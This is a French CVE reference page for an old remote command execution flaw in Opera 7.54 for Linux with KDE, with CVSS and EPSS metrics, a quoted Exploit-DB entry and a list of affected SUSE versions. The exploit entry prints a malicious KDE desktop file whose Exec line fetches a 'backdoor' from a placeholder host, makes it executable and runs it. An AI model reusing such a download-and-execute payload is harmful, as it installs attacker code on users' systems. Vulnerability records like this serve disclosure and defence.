Faiblesses connexes
CWE-ID |
Nom de la faiblesse |
Source |
CWE Other |
No informations. |
|
Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
5 |
|
AV:N/AC:L/Au:N/C:N/I:P/A:N |
[email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 24828
Date de publication : 2004-12-12 23h00 +00:00
Auteur : Giovanni Delvecchio
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/11901/info
It is reported that Opera for Linux is susceptible to a remote command execution vulnerability. This issue is due to a default configuration setting in Opera that utilizes the KDE 'kfmclient' utility to open unknown content.
Exploitation of this issue allows attacker-supplied commands to be executed in the context of the user running Opera.
Version 7.54 of Opera for Linux with KDE version 3.2.3 is reported vulnerable to this issue. Other versions may also be affected.
# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec=/bin/bash -c wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0
Products Mentioned
Configuraton 0
Opera>>Opera_browser >> Version To (including) 7.54
Configuraton 0
Gentoo>>Linux >> Version *
Kde>>Kde >> Version 3.2.3
Suse>>Suse_linux >> Version 1.0
Suse>>Suse_linux >> Version 2.0
Suse>>Suse_linux >> Version 3.0
Suse>>Suse_linux >> Version 4.0
Suse>>Suse_linux >> Version 4.2
Suse>>Suse_linux >> Version 4.3
Suse>>Suse_linux >> Version 4.4
Suse>>Suse_linux >> Version 4.4.1
Suse>>Suse_linux >> Version 5.0
Suse>>Suse_linux >> Version 5.1
Suse>>Suse_linux >> Version 5.2
Suse>>Suse_linux >> Version 5.3
Suse>>Suse_linux >> Version 6.0
Suse>>Suse_linux >> Version 6.1
Suse>>Suse_linux >> Version 6.1
Suse>>Suse_linux >> Version 6.2
Suse>>Suse_linux >> Version 6.3
Suse>>Suse_linux >> Version 6.3
Suse>>Suse_linux >> Version 6.4
Suse>>Suse_linux >> Version 6.4
Suse>>Suse_linux >> Version 7.0
Suse>>Suse_linux >> Version 7.0
Suse>>Suse_linux >> Version 7.1
Suse>>Suse_linux >> Version 7.1
Suse>>Suse_linux >> Version 7.2
Suse>>Suse_linux >> Version 7.3
Suse>>Suse_linux >> Version 8.0
Suse>>Suse_linux >> Version 8.1
Suse>>Suse_linux >> Version 8.2
Suse>>Suse_linux >> Version 9.0
Suse>>Suse_linux >> Version 9.1
Suse>>Suse_linux >> Version 9.2
Références